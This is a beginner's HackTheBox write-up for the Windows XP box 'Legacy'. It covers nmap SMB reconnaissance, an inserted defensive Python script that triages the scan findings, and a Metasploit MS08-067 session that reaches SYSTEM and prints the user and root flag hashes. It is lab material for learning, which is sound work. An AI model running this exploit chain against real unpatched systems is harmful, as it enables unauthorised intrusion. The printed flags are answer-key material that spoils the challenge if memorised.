Legacy Writeup
Disclaimer
I'm just a beginner. Please correct me if I'm wrong.
The second HTB box, and just as lame as the first one.
Machine Information
| Machine | Description |
|---|---|
| Name | Legacy |
| OS | Windows XP |
| Difficulty | Easy |
| Author | ch4p |
Reconnaissance
Services Scan
```text
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:d0:c4 (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-03-18T11:14:31+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h57m12s, deviation: 1h24m50s, median: 4d23h57m12s
```
Only SMB looked interesting after the scan, so a quick web search for "windows xp smb exploit" => MS08-067.
Other attempts at this stage
I could connect, but had no permission to enumerate.
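Before jumping to the exploit, it is worth noting that the scan output above already contains every risk indicator a defender would flag on this host: an end-of-life OS, SMB1-only negotiation, signing disabled, and a guest session accepted. The following Python script is an added example (not part of the original writeup) that parses those nmap SMB script lines and turns them into prioritised findings; the sample input is constructed from the scan above, and the `EOL_CPE_PRODUCTS` list and severity wording are my own assumptions.

```python
# Constructed sample input: the SMB-related lines of the nmap -sC output quoted in this writeup.
SAMPLE_NMAP_OUTPUT = """\
445/tcp open microsoft-ds Windows XP microsoft-ds
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

# Assumed list: CPE product names (as nmap prints them) for Windows releases out of extended support.
EOL_CPE_PRODUCTS = {"windows_2000", "windows_xp", "windows_server_2003", "windows_vista"}


def parse_smb_scripts(text: str) -> dict:
    """Extract the SMB security-mode and OS-discovery fields from nmap's normal output.

    NSE script lines start with '| ' or '|_', so strip that prefix and key on the field name.
    """
    fields = {
        "os_cpe": None,
        "message_signing": None,
        "account_used": None,
        "smb2_negotiation_failed": False,
    }
    for raw in text.splitlines():
        line = raw.lstrip("|_ ")
        if line.startswith("OS CPE:"):
            fields["os_cpe"] = line.split(":", 1)[1].strip()
        elif line.startswith("message_signing:"):
            # value looks like "disabled (dangerous, but default)"; keep only the keyword
            fields["message_signing"] = line.split(":", 1)[1].split()[0]
        elif line.startswith("account_used:"):
            fields["account_used"] = line.split(":", 1)[1].strip()
        elif line.startswith("smb2-time:") and "negotiation failed" in line:
            # smb2-time could not negotiate SMB2, so the host only speaks SMB1
            fields["smb2_negotiation_failed"] = True
    return fields


def cpe_product(cpe: str) -> str:
    """Return the product component of a 'cpe:/part:vendor:product:...' string."""
    parts = cpe.split(":")
    return parts[3] if len(parts) > 3 else ""


def assess(fields: dict) -> list:
    """Turn parsed fields into (severity, finding) pairs, highest severity first."""
    findings = []
    product = cpe_product(fields["os_cpe"] or "")
    if product in EOL_CPE_PRODUCTS:
        findings.append(("critical", f"end-of-life OS '{product}': no vendor patches; isolate or decommission"))
    if fields["smb2_negotiation_failed"]:
        findings.append(("high", "SMB2 negotiation failed: host is SMB1-only; block TCP/445 from untrusted networks"))
    if fields["message_signing"] == "disabled":
        findings.append(("high", "SMB message signing disabled: enforce signing via policy"))
    if fields["account_used"] == "guest":
        findings.append(("medium", "guest/anonymous SMB session accepted: restrict anonymous access"))
    order = {"critical": 0, "high": 1, "medium": 2, "low": 3}
    findings.sort(key=lambda f: order[f[0]])
    return findings


def triage(text: str) -> list:
    """Convenience wrapper: nmap script output in, ordered findings out."""
    return assess(parse_smb_scripts(text))


if __name__ == "__main__":
    for severity, finding in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{severity.upper():8}] {finding}")
```

Run it against saved `nmap -sC -oN` output for any SMB host; a host that returns no findings has signing required, SMB2+ and no anonymous access, which is the state the later sections show Legacy is nowhere near.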
CVE-2008-4250 - MS08-067
CVE Details
MS08-067 is the 67th security bulletin Microsoft released in 2008; it fixes a vulnerability in which mishandling of relative paths leads to shellcode execution.
Exploit with Metasploit
```text
msf > use exploit/windows/smb/ms08_067_netapi
…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1884 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>echo %USERNAME%
echo %USERNAME%
LEGACY$

C:\>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
john                     SUPPORT_388945a0
The command completed with one or more errors.

C:\>type "Documents and Settings\john\desktop\user.txt"
type "Documents and Settings\john\desktop\user.txt"
e69af0e4f443de7e36876fda4ec7644f

C:\>type "Documents and Settings\Administrator\desktop\root.txt"
type "Documents and Settings\Administrator\desktop\root.txt"
993442d258b0e0ec917cae9e695d5713
```
Afterword
Besides MS08-067, EternalBlue also gives RCE on this box.
Last update: 2024-12-23
Created: 2024-03-12